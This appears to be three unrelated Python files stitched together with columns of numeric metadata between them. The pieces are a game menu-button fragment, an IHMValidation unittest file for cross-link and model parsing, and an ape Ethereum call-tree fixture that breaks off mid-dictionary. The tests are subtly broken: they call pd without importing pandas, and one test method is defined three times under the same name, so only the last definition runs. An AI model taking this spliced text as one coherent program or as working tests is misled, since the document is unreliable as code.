ButtonSoundVolume.cancel(scene)
ButtonMusicVolume.cancel(scene)
Button.selected = ButtonOptions(scene)
scene.exec_cancel()
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonMusicVolume(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonLanguage(scene)
def key_left(self, scene):
self.snd_choice.play()
Button.selected = ButtonConfirm(scene)
def key_right(self, scene):
self.snd_choice.play()
Button.selected = ButtonConfirm(scene)
class ButtonContinue(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
Button.selected = cls.instances[scene]
return cls.instances[scene]
def __init__(self, scene):
super().__init__(114, 262, 15, 1, 'uiContinue')
def execute(self, scene):
self.snd_click.play()
scene.exec_continue()
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonQuit(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonOptions(scene)
class ButtonQuit(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(114, 390, 15, 1, 'uiQuit')
def execute(self, scene):
self.snd_click.play()
scene.fade(scene.exec_quit)
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonOptions(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonContinue(scene)
| 28.657957
| 113
| 0.621799
| 1,351
| 12,065
| 5.287195
| 0.087343
| 0.070559
| 0.072799
| 0.089598
| 0.803024
| 0.797004
| 0.775165
| 0.762285
| 0.750525
| 0.743805
| 0
| 0.016043
| 0.26639
| 12,065
| 421
| 114
| 28.657957
| 0.790984
| 0
| 0
| 0.797386
| 0
| 0
| 0.016327
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.261438
| false
| 0
| 0.013072
| 0
| 0.392157
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a7bc968f1052662832c05fcf86ffc0facbe5a759
| 15,283
|
py
|
Python
|
tests/test_cx_validation.py
|
salilab/IHMValidation
|
ddf1a080a4b7f66c2f067312f5f4a5c6584848d1
|
[
"MIT"
] | null | null | null |
tests/test_cx_validation.py
|
salilab/IHMValidation
|
ddf1a080a4b7f66c2f067312f5f4a5c6584848d1
|
[
"MIT"
] | 23
|
2020-12-09T22:27:29.000Z
|
2022-03-30T18:01:43.000Z
|
tests/test_cx_validation.py
|
salilab/IHMValidation
|
ddf1a080a4b7f66c2f067312f5f4a5c6584848d1
|
[
"MIT"
] | 1
|
2022-03-21T22:55:24.000Z
|
2022-03-21T22:55:24.000Z
|
import os,sys
import unittest
from io import StringIO, BytesIO
sys.path.insert(0, "../master/pyext/src/")
from validation import get_input_information,utility
from validation.cx import cx_validation
import warnings
def ignore_warnings(test_func):
def do_test(self, *args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore", ResourceWarning)
test_func(self, *args, **kwargs)
return do_test
class Testing(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(Testing, self).__init__(*args, **kwargs)
#self.mmcif_test_file='test.cif'
#self.IO=cx_validation(self.mmcif_test_file)
def test_get_xl_data_1(self):
"""Test AtomSiteHandler"""
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_cross_link_list.id
_ihm_cross_link_list.group_id
_ihm_cross_link_list.entity_description_1
_ihm_cross_link_list.entity_id_1
_ihm_cross_link_list.seq_id_1
_ihm_cross_link_list.comp_id_1
_ihm_cross_link_list.entity_description_2
_ihm_cross_link_list.entity_id_2
_ihm_cross_link_list.seq_id_2
_ihm_cross_link_list.comp_id_2
_ihm_cross_link_list.linker_type
_ihm_cross_link_list.dataset_list_id
1 1 foo 1 2 THR foo 1 3 CYS DSS 97
loop_
_struct_asym.id
_struct_asym.entity_id
_struct_asym.details
A 1 foo
"""
with open ('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
self.assertEqual(1,I.get_xl_data().shape[0])
self.assertEqual(10,I.get_xl_data().shape[1])
self.assertEqual('DSS',I.get_xl_data()['Linker_Name'].unique()[0])
self.assertEqual('1',I.get_xl_data()['Res1_Entity_ID'].unique()[0])
self.assertEqual(2,I.get_xl_data()['Res1_Seq_ID'].unique()[0])
self.assertEqual('1',I.get_xl_data()['Res2_Entity_ID'].unique()[0])
self.assertEqual(3,I.get_xl_data()['Res2_Seq_ID'].unique()[0])
self.assertEqual('A',I.get_xl_data()['Res1_Chain'].unique()[0])
self.assertEqual('A',I.get_xl_data()['Res2_Chain'].unique()[0])
def test_get_xl_data_2(self):
"""Test AtomSiteHandler"""
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_cross_link_list.id
_ihm_cross_link_list.group_id
_ihm_cross_link_list.entity_description_1
_ihm_cross_link_list.entity_id_1
_ihm_cross_link_list.seq_id_1
_ihm_cross_link_list.comp_id_1
_ihm_cross_link_list.entity_description_2
_ihm_cross_link_list.entity_id_2
_ihm_cross_link_list.seq_id_2
_ihm_cross_link_list.comp_id_2
_ihm_cross_link_list.linker_type
_ihm_cross_link_list.dataset_list_id
1 1 foo 1 2 THR foo 1 3 CYS DSS 97
loop_
_struct_asym.id
_struct_asym.entity_id
_struct_asym.details
A 1 foo
"""
with open ('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
self.assertEqual('DSS',I.get_xl_data()['Linker_Name'].unique()[0])
self.assertEqual('1',I.get_xl_data()['Res1_Entity_ID'].unique()[0])
self.assertEqual(2,I.get_xl_data()['Res1_Seq_ID'].unique()[0])
self.assertEqual('1',I.get_xl_data()['Res2_Entity_ID'].unique()[0])
self.assertEqual(3,I.get_xl_data()['Res2_Seq_ID'].unique()[0])
self.assertEqual('A',I.get_xl_data()['Res1_Chain'].unique()[0])
self.assertEqual('A',I.get_xl_data()['Res2_Chain'].unique()[0])
def test_get_asym_for_entity(self):
"""Test AtomSiteHandler"""
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_struct_asym.id
_struct_asym.entity_id
_struct_asym.details
A 1 foo
"""
with open ('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
self.assertEqual('1',list(I.get_asym_for_entity().keys())[0])
self.assertEqual(['A'],list(I.get_asym_for_entity().values())[0])
def test_get_asym_for_entity_dimer(self):
"""Test AtomSiteHandler"""
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_struct_asym.id
_struct_asym.entity_id
_struct_asym.details
A 1 foo
B 1 foo
"""
with open ('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
self.assertEqual('1',list(I.get_asym_for_entity().keys())[0])
self.assertEqual(['A','B'],list(I.get_asym_for_entity().values())[0])
def test_get_sphere_model_dict(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_ihm_sphere_obj_site.id
_ihm_sphere_obj_site.entity_id
_ihm_sphere_obj_site.seq_id_begin
_ihm_sphere_obj_site.seq_id_end
_ihm_sphere_obj_site.asym_id
_ihm_sphere_obj_site.Cartn_x
_ihm_sphere_obj_site.Cartn_y
_ihm_sphere_obj_site.Cartn_z
_ihm_sphere_obj_site.object_radius
_ihm_sphere_obj_site.rmsf
_ihm_sphere_obj_site.model_id
1 1 1 6 A 389.993 145.089 134.782 4.931 . 1
2 1 7 7 B 406.895 142.176 135.653 3.318 1.34 1
"""
with open ('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
self.assertEqual(2,len(I.get_sphere_model_dict()[1]) )
def test_get_atom_model_dict(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_atom_site.group_PDB
_atom_site.id
_atom_site.type_symbol
_atom_site.label_atom_id
_atom_site.label_alt_id
_atom_site.label_comp_id
_atom_site.label_seq_id
_atom_site.label_asym_id
_atom_site.Cartn_x
_atom_site.Cartn_y
_atom_site.Cartn_z
_atom_site.occupancy
_atom_site.label_entity_id
_atom_site.auth_asym_id
_atom_site.B_iso_or_equiv
_atom_site.pdbx_PDB_model_num
_atom_site.ihm_model_id
ATOM 1 N N . SER 1 A 54.401 -49.984 -35.287 . 1 A . 1 1
"""
with open ('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
self.assertEqual(1,len(I.get_atom_model_dict()[1]) )
def test_get_xyzrseq_spheres(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_ihm_sphere_obj_site.id
_ihm_sphere_obj_site.entity_id
_ihm_sphere_obj_site.seq_id_begin
_ihm_sphere_obj_site.seq_id_end
_ihm_sphere_obj_site.asym_id
_ihm_sphere_obj_site.Cartn_x
_ihm_sphere_obj_site.Cartn_y
_ihm_sphere_obj_site.Cartn_z
_ihm_sphere_obj_site.object_radius
_ihm_sphere_obj_site.rmsf
_ihm_sphere_obj_site.model_id
1 1 1 6 A 389.993 145.089 134.782 4.931 . 1
1 1 7 7 A 389.993 145.089 134.782 4.931 . 1
"""
with open ('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
spheres=I.get_sphere_model_dict()[1]
self.assertEqual((1,9),I.get_xyzrseq_spheres(spheres)[0].shape)
self.assertEqual((1,8),I.get_xyzrseq_spheres(spheres)[1].shape)
self.assertEqual('A',I.get_xyzrseq_spheres(spheres)[0]['Chain'].unique()[0])
self.assertEqual('A',I.get_xyzrseq_spheres(spheres)[1]['Chain'].unique()[0])
self.assertEqual(389.993,I.get_xyzrseq_spheres(spheres)[0]['X'].unique()[0])
self.assertEqual(145.089,I.get_xyzrseq_spheres(spheres)[1]['Y'].unique()[0])
def test_get_atom_model_dict(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_atom_site.group_PDB
_atom_site.id
_atom_site.type_symbol
_atom_site.label_atom_id
_atom_site.label_alt_id
_atom_site.label_comp_id
_atom_site.label_seq_id
_atom_site.label_asym_id
_atom_site.Cartn_x
_atom_site.Cartn_y
_atom_site.Cartn_z
_atom_site.occupancy
_atom_site.label_entity_id
_atom_site.auth_asym_id
_atom_site.B_iso_or_equiv
_atom_site.pdbx_PDB_model_num
_atom_site.ihm_model_id
ATOM 1 CA CA . SER 1 A 54.401 -49.984 -35.287 . 1 A . 1 1
"""
with open ('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
atom=I.get_atom_model_dict()[1]
self.assertEqual(1,I.get_xyzrseq_atoms(atom)['Seq'].unique()[0])
self.assertEqual('A',I.get_xyzrseq_atoms(atom)['Chain'].unique()[0])
self.assertEqual('CA',I.get_xyzrseq_atoms(atom)['Atom'].unique()[0])
self.assertEqual(54.401,I.get_xyzrseq_atoms(atom)['X'].unique()[0])
self.assertEqual('A_1',I.get_xyzrseq_atoms(atom)['Res_ID'].unique()[0])
def test_convert_df_unstruc(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_ihm_sphere_obj_site.id
_ihm_sphere_obj_site.entity_id
_ihm_sphere_obj_site.seq_id_begin
_ihm_sphere_obj_site.seq_id_end
_ihm_sphere_obj_site.asym_id
_ihm_sphere_obj_site.Cartn_x
_ihm_sphere_obj_site.Cartn_y
_ihm_sphere_obj_site.Cartn_z
_ihm_sphere_obj_site.object_radius
_ihm_sphere_obj_site.rmsf
_ihm_sphere_obj_site.model_id
1 1 1 6 A 389.993 145.089 134.782 4.931 . 1
1 1 7 7 A 389.993 145.089 134.782 4.931 . 1
"""
with open ('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
spheres=I.get_sphere_model_dict()[1]
self.assertEqual((6,9),I.convert_df_unstruc(I.get_xyzrseq_spheres(spheres)[1]).shape)
def test_get_complete_df_hybrid(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_ihm_sphere_obj_site.id
_ihm_sphere_obj_site.entity_id
_ihm_sphere_obj_site.seq_id_begin
_ihm_sphere_obj_site.seq_id_end
_ihm_sphere_obj_site.asym_id
_ihm_sphere_obj_site.Cartn_x
_ihm_sphere_obj_site.Cartn_y
_ihm_sphere_obj_site.Cartn_z
_ihm_sphere_obj_site.object_radius
_ihm_sphere_obj_site.rmsf
_ihm_sphere_obj_site.model_id
1 1 1 6 A 389.993 145.089 134.782 4.931 . 1
1 1 7 7 A 389.993 145.089 134.782 4.931 . 1
loop_
_ihm_cross_link_list.id
_ihm_cross_link_list.group_id
_ihm_cross_link_list.entity_description_1
_ihm_cross_link_list.entity_id_1
_ihm_cross_link_list.seq_id_1
_ihm_cross_link_list.comp_id_1
_ihm_cross_link_list.entity_description_2
_ihm_cross_link_list.entity_id_2
_ihm_cross_link_list.seq_id_2
_ihm_cross_link_list.comp_id_2
_ihm_cross_link_list.linker_type
_ihm_cross_link_list.dataset_list_id
1 1 foo 1 2 THR foo 1 3 CYS DSS 97
loop_
_struct_asym.id
_struct_asym.entity_id
_struct_asym.details
A 1 foo
"""
with open ('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
spheres=I.get_sphere_model_dict()[1]
df_s,df_u=I.get_xyzrseq_spheres(spheres)
df=I.convert_df_unstruc(df_u)
xl_df=I.get_xl_data()
self.assertEqual((1,11),I.get_complete_df_hybrid(xl_df,df).shape)
self.assertEqual(389.993,I.get_complete_df_hybrid(xl_df,df)['Res1_X'].unique()[0])
self.assertEqual('2_3',I.get_complete_df_hybrid(xl_df,df)['XL_ID'].unique()[0])
self.assertEqual('A_2',I.get_complete_df_hybrid(xl_df,df)['Res1'].unique()[0])
def test_get_atom_model_dict(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_atom_site.group_PDB
_atom_site.id
_atom_site.type_symbol
_atom_site.label_atom_id
_atom_site.label_alt_id
_atom_site.label_comp_id
_atom_site.label_seq_id
_atom_site.label_asym_id
_atom_site.Cartn_x
_atom_site.Cartn_y
_atom_site.Cartn_z
_atom_site.occupancy
_atom_site.label_entity_id
_atom_site.auth_asym_id
_atom_site.B_iso_or_equiv
_atom_site.pdbx_PDB_model_num
_atom_site.ihm_model_id
ATOM 1 CA CA . SER 1 A 54.401 -49.984 -35.287 . 1 A . 1 1
ATOM 2 CA CA . SER 2 A 54.401 -49.984 -35.287 . 3 A . 1 1
ATOM 3 CA CA . SER 3 A 54.401 -49.984 -35.287 . 3 A . 1 1
loop_
_ihm_cross_link_list.id
_ihm_cross_link_list.group_id
_ihm_cross_link_list.entity_description_1
_ihm_cross_link_list.entity_id_1
_ihm_cross_link_list.seq_id_1
_ihm_cross_link_list.comp_id_1
_ihm_cross_link_list.entity_description_2
_ihm_cross_link_list.entity_id_2
_ihm_cross_link_list.seq_id_2
_ihm_cross_link_list.comp_id_2
_ihm_cross_link_list.linker_type
_ihm_cross_link_list.dataset_list_id
1 1 foo 1 2 THR foo 1 3 CYS DSS 97
loop_
_struct_asym.id
_struct_asym.entity_id
_struct_asym.details
A 1 foo
"""
with open ('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
atom=I.get_atom_model_dict()[1]
df=I.get_xyzrseq_atoms(atom)
xl_df=I.get_xl_data()
self.assertEqual((1,11),I.get_complete_df_atomic(xl_df,df).shape)
self.assertEqual(54.401,I.get_complete_df_atomic(xl_df,df)['Res1_X'].unique()[0])
self.assertEqual('2_3',I.get_complete_df_atomic(xl_df,df)['XL_ID'].unique()[0])
self.assertEqual('A_2',I.get_complete_df_atomic(xl_df,df)['Res1'].unique()[0])
def test_get_distance(self):
lst=pd.DataFrame([[4,5,6,1,2,3]],columns=['Res1_X','Res1_Y','Res1_Z',
'Res2_X','Res2_Y','Res2_Z'])
I=cx_validation('test.cif')
self.assertEqual(5,int(I.get_distance(lst)['dist'].values[0]))
def test_label_inter_intra_1(self):
lst=pd.DataFrame([['C_4','C_5']],columns=['Res1','Res2'])
I=cx_validation('test.cif')
self.assertEqual(1,int(I.label_inter_intra(lst)['Intra'].values[0]))
def test_label_inter_intra_2(self):
lst=pd.DataFrame([['C_4','D_5']],columns=['Res1','Res2'])
I=cx_validation('test.cif')
self.assertEqual(0,int(I.label_inter_intra(lst)['Intra'].values[0]))
def test_get_violation(self):
I=cx_validation('test.cif')
print (I.get_violation('DSS',31))
self.assertEqual(0,I.get_violation('DSS',31))
self.assertEqual(1,I.get_violation('DSS',29))
self.assertEqual(1,I.get_violation('EDC',20))
self.assertEqual(0,I.get_violation('EDC',29))
def test_process_ambiguity(self):
lst=pd.DataFrame([['C_4',23],['C_4',11],['C_5',22]],columns=['XL_ID','dist'])
I=cx_validation('test.cif')
self.assertEqual(22,I.process_ambiguity(lst)['dist'].values[0])
self.assertEqual(11,I.process_ambiguity(lst)['dist'].values[1])
self.assertEqual('C_5',I.process_ambiguity(lst)['XL_ID'].values[0])
self.assertEqual('C_4',I.process_ambiguity(lst)['XL_ID'].values[1])
def test_get_violation_plot(self):
lst=pd.DataFrame([['C_4',0],['C_4',1],['C_5',1]],columns=['XL_ID','Satisfied'])
model_df={1:lst}
I=cx_validation('test.cif')
self.assertEqual(66,int(I.get_violation_plot(model_df)[1]))
if __name__ == '__main__':
unittest.main(warnings='ignore')
| 27.145648
| 87
| 0.787345
| 2,872
| 15,283
| 3.706128
| 0.067201
| 0.054867
| 0.054115
| 0.072153
| 0.897501
| 0.874859
| 0.828354
| 0.793311
| 0.777809
| 0.769448
| 0
| 0.046472
| 0.087614
| 15,283
| 562
| 88
| 27.19395
| 0.716867
| 0.010338
| 0
| 0.79619
| 0
| 0.011429
| 0.581512
| 0.359423
| 0
| 0
| 0
| 0
| 0.102857
| 1
| 0.038095
| false
| 0
| 0.011429
| 0
| 0.053333
| 0.001905
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac1f5723d7fabd1670fe8946ed82a6eaa81db9a9
| 237,531
|
py
|
Python
|
tests/functional/data/python/__init__.py
|
johnson2427/ape
|
e0dbce86d7ddb4574df109f443718f19dc183608
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/data/python/__init__.py
|
johnson2427/ape
|
e0dbce86d7ddb4574df109f443718f19dc183608
|
[
"Apache-2.0"
] | 1
|
2022-02-12T01:31:16.000Z
|
2022-02-22T00:26:49.000Z
|
tests/functional/data/python/__init__.py
|
johnson2427/ape
|
e0dbce86d7ddb4574df109f443718f19dc183608
|
[
"Apache-2.0"
] | null | null | null |
from evm_trace import CallType
from evm_trace.display import DisplayableCallTreeNode
from hexbytes import HexBytes
from ape_ethereum.transactions import TransactionStatusEnum
LOCAL_CALL_TREE_DICT = {
"call_type": CallType.CALL,
"address": "a",
"value": 123,
"depth": 0,
"gas_limit": 492533,
"gas_cost": 469604,
"calldata": HexBytes("0x372dca07"),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000001e59ce931b4cfea3fe4b875411e280e173cb7a9c" # noqa: E501
),
"calls": [
{
"call_type": CallType.CALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 468829,
"gas_cost": 461506,
"calldata": HexBytes(
"0x045856de00000000000000000000000000000000000000000000000000000000000393cc"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000001564ff3f0da300000000000000000000000000000000000000000000000000000002964619c700000000000000000000000000000000000000000000000000000000000393cc00000000000000000000000000000000000000000000000004cae9c39bdb4f7700000000000000000000000000000000000000000000000000005af310694bb20000000000000000000000000000000000000000011dc18b6f8f1601b7b1b33100000000000000000000000000000000000000000000000000000000000393cc000000000000000000000000000000000000000000000004ffd72d92184e6bb20000000000000000000000000000000000000000000000000000000000000d7e000000000000000000000000000000000000000000000006067396b875234f7700000000000000000000000000000000000000000000000000012f39bc807bb20000000000000000000000000000000000000002f5db749b3db467538fb1b331"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 408447,
"gas_cost": 402067,
"calldata": HexBytes(
"0xbeed0f8500000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000011dc18b6f8f1601b7b1b33100000000000000000000000000000000000000000000000000000000000000096963652d637265616d0000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 375975,
"gas_cost": 370103,
"calldata": HexBytes("0x7007cbe8"),
"returndata": HexBytes(
"0x000000000000000000000000000000000293b0e3558d33b8a4c483e40e2b8db9000000000000000000000000000000000000000000000000018b932eebcc7eb90000000000000000000000000000000000bf550935e92f79f09e3530df8660c5"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 369643,
"gas_cost": 363869,
"calldata": HexBytes(
"0x878fb70100000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000011dc18b6f8f1601b7b1b331000000000000000000000000f2df0b975c0c9efa2f8ca0491c2d1685104d2488000000000000000000000000000000000000000000000000000000000000000773696d706c657200000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 237135,
"gas_cost": 233432,
"calldata": HexBytes(
"0xb27b88040000000000000000000000001e59ce931b4cfea3fe4b875411e280e173cb7a9c"
),
"returndata": HexBytes(
"0x0000000000000000000000001e59ce931b4cfea3fe4b875411e280e173cb7a9c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 235631,
"gas_cost": 231951,
"calldata": HexBytes(
"0xb9e5b20a0000000000000000000000001e59ce931b4cfea3fe4b875411e280e173cb7a9c"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 230967,
"gas_cost": 227360,
"calldata": HexBytes(
"0xe5e1d93f000000000000000000000000f2df0b975c0c9efa2f8ca0491c2d1685104d2488"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000011dc18b6f8f1601b7b1b331000000000000000000000000f2df0b975c0c9efa2f8ca0491c2d1685104d2488000000000000000000000000000000000000000000000000000000000000000773696d706c657200000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 225789,
"gas_cost": 222263,
"calldata": HexBytes(
"0x878fb70100000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000274b028b03a250ca03644e6c578d81f019ee1323000000000000000000000000000000000000000000000000000000000000000773696d706c657200000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 149571,
"gas_cost": 147236,
"calldata": HexBytes("0x90bb7141"),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 123951,
"gas_cost": 122016,
"calldata": HexBytes("0x90bb7141"),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": "c",
"value": 0,
"depth": 1,
"gas_limit": 101895,
"gas_cost": 100305,
"calldata": HexBytes(
"0xbff2e0950000000000000000000000001e59ce931b4cfea3fe4b875411e280e173cb7a9c"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 95764,
"gas_cost": 94270,
"calldata": HexBytes(
"0x9155fd570000000000000000000000001e59ce931b4cfea3fe4b875411e280e173cb7a9c"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 93784,
"gas_cost": 92321,
"calldata": HexBytes(
"0xbeed0f850000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000096c656d6f6e64726f700000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 87872,
"gas_cost": 86501,
"calldata": HexBytes("0x7007cbe8"),
"returndata": HexBytes(
"0x000000000000000000000000000000000293b0e3558d33b8a4c483e40e2b8db9000000000000000000000000000000000000000000000000018b932eebcc7eb90000000000000000000000000000000000bf550935e92f79f09e3530df8660c5"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 84040,
"gas_cost": 82729,
"calldata": HexBytes(
"0x878fb70100000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f2df0b975c0c9efa2f8ca0491c2d1685104d2488000000000000000000000000000000000000000000000000000000000000000773696d706c657200000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 56127,
"gas_cost": 55252,
"calldata": HexBytes(
"0xbeed0f850000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000006f0000000000000000000000000000000000000000000000000000000000000014736e6974636865735f6765745f73746963686573000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 52903,
